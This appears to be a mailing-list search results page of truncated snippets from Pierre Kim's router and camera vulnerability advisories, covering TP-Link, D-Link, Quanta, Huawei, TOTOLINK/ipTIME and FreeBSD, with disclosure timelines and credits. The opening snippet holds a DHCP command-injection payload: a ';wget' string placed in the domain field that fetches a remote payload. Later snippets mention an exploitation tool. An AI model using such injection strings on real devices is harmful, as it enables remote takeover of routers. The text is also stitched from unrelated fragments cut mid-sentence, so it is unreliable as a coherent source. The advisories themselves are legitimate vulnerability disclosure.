:1/dhcps4/pool/end 192.168.0.199
xmldbc -s /runtime/inf:1/dhcps4/pool/leasetime 604800
xmldbc -s /runtime/inf:1/dhcps4/pool/network 192.168.0.1
xmldbc -s /runtime/inf:1/dhcps4/pool/mask 24
xmldbc -s /runtime/inf:1/dhcps4/pool/domain ;wget -O /var/re
http://10.254.239.1/dhcp-rce ;
Hello,
Please find a text-only version below sent to security mailing lists.
The complete version on analysing the security of "Wireless IP Camera
(P2P) WIFICAM cameras and vulnerabilities in GoAhead" is posted here:
https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
===
als.
## Report Timeline
* Sep 17, 2016: Vulnerabilities found by Pierre Kim.
* Dec 26, 2016: TP-Link support is contacted by livechat. TP-Link
replies there is no process to handle security problems in TP-Link
routers and refuses to indicate a security point of contact.
* Dec 27, 2016: TP-Link
estions should contact their local/regional D-Link
support offices for the latest information.
## Report Timeline
* Dec 04, 2015: Vulnerabilities found by Pierre Kim in Quanta routers.
* Apr 04, 2016: A public advisory about Quanta routers is sent to
security mailing lists.
* Jun 09, 2016: Pierre
e permissions for existing installations.
This vulnerability can be fixed by modifying the permission on
/etc/bsnmpd.conf to owner root:wheel and permission 0600.
## Report Timeline
* Nov 04, 2015: Vulnerability found by Pierre Kim.
* Nov 05, 2015: security-offi...@freebsd.org is notified of the vulne
RAPI daemon without authentication.
I wrote a tool, "GHETTO-BLASTER", to industrialize the process:
user@kali:~$ ./GHETTO-BLASTER http://
Example:
https://
2015 Pierre Kim <pierre.kim@gmail.com>
@PierreKimSec https://pierrekim.github.io
DO WHAT THE FUCK YOU W
rs are in the End Of Service cycle and will not be
supported anymore.
The vendor encourages its clients to discard existing unsupported models
and to use new routers.
## Report Timeline
* Jul 01, 2015: Vulnerabilities found by Pierre Kim.
* Oct 28, 2015: Huawei PSIRT is notified of the vulnerab
.
## Report Timeline
* Nov 04, 2015: Vulnerability found by Pierre Kim.
* Nov 06, 2015: Stuart Henderson is notified of the vulnerability.
* Nov 06, 2015: Stuart Henderson confirms the vulnerability and fixes
the package permissions for the sample configuration file in -current
and -stable.
* Nov
U
B970, WLA1GAPU
B932, WLB1TIPU
B933, WLB1TIPU
B220, WLA1GCYU
B260, WLA1GCYU
B270, WLA1GCYU
B972, WLA1GCYU
B200-20, WLB3TILU
B200-30, WLB3TILU
B200-40, WLB3TILU
B200-50, WLB3TILU
??, WLA1GCPU
## Vendor Response
The vulnerable routers are in the End Of Service cycle and will not be
,
--
Pierre Kim
pierre.kim@gmail.com
@PierreKimSec
https://pierrekim.github.io/
vulnerable.
* Jul 16, 2015: A public advisory is sent to security mailing lists.
## Credit
These vulnerabilities were found by Alexandre Torres and Pierre Kim
(@PierreKimSec).
## References
https://pierrekim.github.io/advisories/2015-totolink-0x02.txt
https://pierrekim.github.io/blog/2015-07-16
.
## Report Timeline
* Apr 20, 2015: Vulnerabilities found by Pierre Kim in ipTIME devices.
* Jun 20, 2015: Vulnerabilities confirmed with reliable PoCs.
* Jun 25, 2015: Vulnerabilities found in TOTOLINK products by looking
for similar ipTIME products.
* Jul 16, 2015: A public advisory is sent to security
to un-ethical code found in TOTOLINK products (= backdoors found
in new TOTOLINK devices), TOTOLINK was not contacted in regard of this
case, but ipTIME was contacted in April 2015 concerning the first RCE.
## Report Timeline
* Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres
* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares.
* Jun 26, 2015: working PoCs.
* Jul 16, 2015: A public advisory is sent to security mailing lists.
## Credit
These backdoor credentials were found Pierre Kim (@PierreKimSec).
## References
https://pierrekim.github.io/advisories
to be useless.
They don't publish security information in the changelog, they don't
answer to security researchers and
they don't credit them either.
EFMNetworks ipTIME was not contacted in regard of this case.
## Report Timeline
* Apr 20, 2015: Vulnerabilities found by Pierre Kim.
* Jun 20
researchers and
they don't credit them either.
EFMNetworks ipTIME was not contacted in regard of this case.
## Report Timeline
* Jun 02, 2014: Vulnerability found by Pierre Kim.
* Apr 07, 2015: Vulnerabilities confirmed with reliable PoCs.
* Jun 25, 2015: Vulnerability confirmed on all
Response
The vendor has released a new firmware version (9.58) for 112 devices:
http://iptime.com/iptime/?uid=16202mod=documentpage_id=16
## Report Timeline
* Jun 01, 2014: Vulnerability found by Pierre Kim and Alexandre Torres.
* Mar 24, 2015: Vulnerability confirmed on all the existing
, 10.1-STABLE
- releng/10.1, 10.1-RELEASE-p8
- releng/10.0, 10.0-RELEASE-p18
## Report Timeline
* Mar 01, 2015: Problem found by Pierre Kim
* Apr 01, 2015: Vendor is notified of the vulnerability
* Apr 01, 2015: Vendor confirms report and indicates a fix is prepared
18 matches
Mail list logo
